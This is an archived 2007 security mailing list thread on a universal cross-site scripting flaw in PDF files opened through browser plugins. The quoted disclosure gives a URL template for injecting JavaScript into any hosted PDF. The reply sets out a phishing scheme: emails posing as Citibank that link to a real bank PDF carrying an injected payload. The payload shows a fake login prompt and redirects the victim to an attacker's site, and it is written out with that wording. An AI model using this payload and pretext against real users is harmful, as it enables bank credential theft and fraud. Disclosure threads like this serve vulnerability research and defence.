lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 4 Jan 2007 08:54:44 +1100
From: "Jean-Jacques Halans" <>
To: "pdp (architect)" <>
	"Web Security" <>
Subject: Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

And it makes a great phishing hole too.
Google for any banking pdf's
and attach your fake banking site to let the user login to read the article.

For example:
Send out an email pretending to come from Citibank, about a new
article on Wealth Management, with a link to the real article:;var%20temp=confirm(%22Dear%20Citibank%20Customer,\n\nPlease%20login%20to%20read%20the%20article.\nAfter%20login%20you%20will%20be%20returned%20to%20the%20article.\n\n%22);var%20url2=%22;if(temp){document.location=url2}else{document.location=url}
Notice the popup (in firefox) which says: "The page at says:"


On 1/3/07, pdp (architect) <> wrote:
> I will be very quick and just point to links where you can read about
> this issue.
> It seams that PDF documents can execute JavaScript code for no
> apparent reason by using the following template:
>     http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
> You must understand that the attacker doesn't need to have write
> access to the specified PDF document. In order to get an XSS vector
> working you need to have a PDF file hosted on the target and that's
> all about it. The rest is just a matter of your abilities and desires.
> This finding was originally mentioned by Sven Vetsch, on his blog.
> This is a very good and quite interesting. Good work.
> There is a POC I composed:
> More on the matter can be found here:
> --
> pdp (architect) | petko d. petkov
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> The Web Security Mailing List Archives:
> [RSS Feed]

Halans Jean-Jacques

Powered by blists - more mailing lists